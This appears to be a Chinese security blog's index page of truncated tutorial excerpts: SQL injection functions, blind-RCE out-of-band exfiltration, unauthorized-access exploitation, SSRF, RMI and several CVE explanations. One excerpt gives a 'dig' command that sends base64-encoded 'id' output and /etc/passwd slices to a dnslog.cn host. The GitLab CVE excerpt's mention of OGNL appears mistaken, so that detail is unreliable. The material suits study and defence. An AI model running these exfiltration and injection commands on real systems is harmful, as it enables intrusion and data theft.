1.kafka下载和安装
下载地址
https://kafka.apache.org/downloads
直接下载.tgz 解压即安装完成
1$ tar -xvf kafka_2.13-3.7.1.tgz
2.启动运行2.1.通过zookeeper启动
通过zookeeper 启动 kafka
1234567891011121314# 先启动zookeeper 先进入目录下得bin目录$ ./zookeeper-server-start.sh ../config/zookeeper.properties &# 关闭zookeeper $ ./zookeeper-server-stop.sh ../config/zookeeper.properties# 启动kafka$ ./kafka-server-start.sh ../config/server.properties &# 关闭kafka$ ./kafka-server-stop.sh ../config/server.properties# 可以使用命令查看端口是否开启$ netstat -nlpt
...
网络安全
未读1.通用查询1.1.函数
concat(arg1,arg2,arg3); arg可拼接字符串或者查询语句或列名
group_concat(arg); 用于将当列中的所有数据拼接成一组返回
concat_ws(str1,arg1,arg2,arg3);使用str1将参数中的三个数据进行拼接
substr(str,argint1,argint2);表示字符串截取, argint1表示截取开始索引,argint2,表示截取长度,索引从1开始
mid,substr的完美替代品
123select mid((select database()),1,1);select mid((select database()) from 1 for 1);
ascii(arg), 用于字符返回的ascii码,返回数字,常用于二分法。可使用ord替代
extractvalue(1,concat(0x7e,(arg),0x7e));arg为查询参数,最长有效字符为32位
updatexml(1,concat(0x7e,(arg),0x7e),1);和上面同理
exp(arg); exp报错函数
slee ...
1.简介
在很多时候我们拿到一个RCE漏洞时可能存在没有回显的利用链,那么在这时,就需要我们通过出网,将我们执行命令的结果外带出来,以此来观察执行命令的结果。
其中我们主要是通过输入“$(cmd)”可以将执行命令的结果以请求参数的形式外带出来。
2.外网dnslog获取dnslog https://dnslog.cn/
1234567891011121314151617181920$ dig $(echo -n $(id) | base64 | head -c 63).g8mpq4.dnslog.cn# 命令解读, dig 解析域名 ,$() 调用返回结果作为参数调用,id 需要命令执行字符串,BASE64 将$(id)执行的结果进行BASE64编码,便于传输,head -c 63 只输出前0-63个字符,如果不足则全部输出# 如果说只需要取其中一段命令结果$ echo -n $(cat /etc/passwd) | base64 | head -c 127 | cut -c 64-# 这样就可以取到64到127的BASE64的字符串了,cut -c 64- 表示从第64个字符开始到 ...
网络安全
未读常见未授权访问漏洞利用1.Druid 未授权访问
Druid是阿里巴巴数据监控的一个软件。
1.1.路径地址
/druid/index.html
1.2.如何利用
可能未授权,在后续版本中可能需要登陆,因此可以尝试弱口令。
进入页面后,在首页中可以看到jdk的版本信息,后续如果要进行JNDI注入的话有利于利用链的选择。
我们还需要着重关注两个点,一个是URI监控,一个是Seesion监控
在URI监控中可以看到,该系统访问过接口的历史记录,这些接口都可以进行Fuzz测试。
在Session监控中我们可以看到,系统中存储的session历史记录,可以将这些session和URI中的接口组合起来进行测试。
因此可以编写爬虫或者利用burp inturder工具将这些这些数据爬取出来在工具中跑。
2.Swagger UI 未授权访问
Swagger ui 是一个用于设计、构建、文档化和使用RESTFUL风格的Web服务的开源框架。
2.1.路径地址
/swagger/v1/swagger.json
/do ...
网络安全
未读SSRF漏洞详解以下是关于 SSRF(Server-Side Request Forgery,服务端请求伪造) 漏洞的详细解析,涵盖原理、危害、利用场景、防御方法等内容。
一、SSRF 漏洞基础概念定义:SSRF 是一种攻击者通过构造恶意请求,诱导服务器端发起非预期的网络请求的漏洞。攻击目标通常是服务器本身或内网资源,利用服务器作为“代理”访问受限资源。
核心问题:服务器未对用户输入的 URL 或参数进行严格校验,直接用于发起网络请求(如 HTTP、FTP、Redis 协议等)。
二、SSRF 攻击原理
攻击流程
1攻击者构造恶意请求 → 服务器接收请求 → 服务器发起非预期请求 → 访问敏感资源或服务
常见触发点
用户输入 URL 参数(如图片下载、网页抓取、API 调用)。
服务器功能依赖外部资源(如 OAuth 授权、XML 解析)。
云服务元数据接口(如 AWS/Aliyun 的 169.254.169.254)。
三、SSRF 的危害场景
访问内网服务
扫描内网端口和服务(如 Redis、MySQL、Consul 等未授权服务)。
攻击 ...
1.RMI服务调用
RMI的功能
服务端:将远程对象绑定到注册表(Registry),并发布一个唯一的名称(如 rmi://host:port/ServiceName)。
客户端:通过注册表查找远程对象的引用(Stub),获取调用入口。
1.1.写一个RMIdemo
那么我们现在先写一个远程对象的demo
远程对象接口
1234567import java.rmi.Remote;import java.rmi.RemoteException;public interface IRemoteObj extends Remote { public String sayHello(String keywords) throws RemoteException;}
远程对象实现
123456789101112131415import java.rmi.RemoteException;import java.rmi.server.UnicastRemoteObject;public class RemoteObjImpl extends Unicas ...
1.漏洞简介CVE-2021-22205 漏洞详解CVE-2021-22205 是 GitLab 中的一个严重远程代码执行(RCE)漏洞,攻击者可以通过上传特制的恶意图片文件,利用 GitLab 对图像文件解析的缺陷,在目标服务器上执行任意命令。该漏洞的 CVSS 评分为 9.9,影响范围广泛,危害极大。
1. 漏洞背景GitLab 是一个基于 Web 的 DevOps 生命周期工具,提供 Git 存储库管理、持续集成和部署等功能。该漏洞的核心问题在于 GitLab 的 ExifTool 组件未能正确处理传入的图像文件,导致攻击者可以通过上传恶意图片文件触发远程代码执行。
2. 漏洞原理漏洞的核心在于 GitLab 对图像文件的解析机制:
ExifTool 解析缺陷:
GitLab 使用 ExifTool 解析上传的图像文件,但未对文件内容进行严格验证。
攻击者可以通过构造包含恶意代码的 DjVu 格式图片文件,利用 ExifTool 的解析逻辑触发命令执行。
恶意文件构造:
攻击者使用 DjVu 格式的图片文件,并在文件中嵌入恶意 OGNL(Object-Graph N ...
1.漏洞简介CVE-2017-3066 漏洞详解CVE-2017-3066 是 Adobe ColdFusion 中的一个严重反序列化漏洞,攻击者可以通过构造恶意的 AMF(Action Message Format)请求,触发反序列化操作,从而在目标服务器上执行任意代码。以下是该漏洞的详细解析,包括漏洞原理、利用条件、影响版本及复现步骤。
1. 漏洞背景Adobe ColdFusion 是一个动态 Web 服务器,支持 CFML(ColdFusion Markup Language)脚本语言,广泛用于构建 Web 应用程序。该漏洞的核心问题在于 ColdFusion 对 AMF 请求的反序列化处理存在缺陷,导致攻击者可以通过构造恶意请求实现远程代码执行(RCE)。
2. 漏洞原理漏洞的核心在于 ColdFusion 的 AMF 反序列化机制:
AMF 协议:
AMF 是一种用于客户端与服务器之间通信的二进制协议,常用于 Flash 和 Flex 应用程序。
ColdFusion 通过 /flex2gateway/amf 端点处理 AMF 请求。
反序列化漏洞:
Cold ...
1.漏洞简介6.CVE-2022-26134 漏洞详解CVE-2022-26134 是 Atlassian Confluence 中的一个严重远程代码执行(RCE)漏洞,也称为 Confluence OGNL 注入漏洞。该漏洞允许攻击者通过构造恶意的 OGNL(Object-Graph Navigation Language)表达式,在未经身份验证的情况下远程执行任意代码。以下是该漏洞的详细解析,包括漏洞原理、利用条件、影响版本及复现步骤。
1. 漏洞背景Atlassian Confluence 是一款广泛使用的企业级 Wiki 和知识管理工具,用于团队协作和信息共享。2022 年 6 月,Atlassian 发布安全公告,披露了 Confluence Server 和 Data Center 中的一个严重漏洞(CVE-2022-26134),攻击者可以通过 OGNL 注入实现远程代码执行,危害极大。
2. CVSS V3 评分
CVSS V3 评分:9.8(高危)
3. 漏洞原理漏洞的核心在于 Confluence 对用户输入的 OGNL 表达式处理不当:
OGNL 注入:
...
1.漏洞简介CVE-2022-22947 漏洞详解CVE-2022-22947 是 Spring Cloud Gateway 中的一个严重远程代码执行(RCE)漏洞,也称为 Spring Cloud Gateway SpEL 注入漏洞。该漏洞允许攻击者通过构造恶意的请求,利用 Spring 表达式语言(SpEL)注入,在目标服务器上执行任意代码。以下是该漏洞的详细解析,包括漏洞原理、利用条件、影响版本及修复建议。
1. 漏洞背景Spring Cloud Gateway 是 Spring Cloud 生态系统中的一个 API 网关,用于为微服务架构提供路由、负载均衡、安全控制等功能。该漏洞的核心问题在于 Spring Cloud Gateway 的 Actuator 端点,当该端点被启用并暴露时,攻击者可以通过发送恶意请求触发 SpEL 表达式注入,从而实现远程代码执行。
2. 漏洞原理漏洞的核心在于 Spring Cloud Gateway 对 SpEL 表达式的处理机制:
Actuator 端点:
Spring Boot Actuator 提供了管理和监控应用程序的功能,包括 ...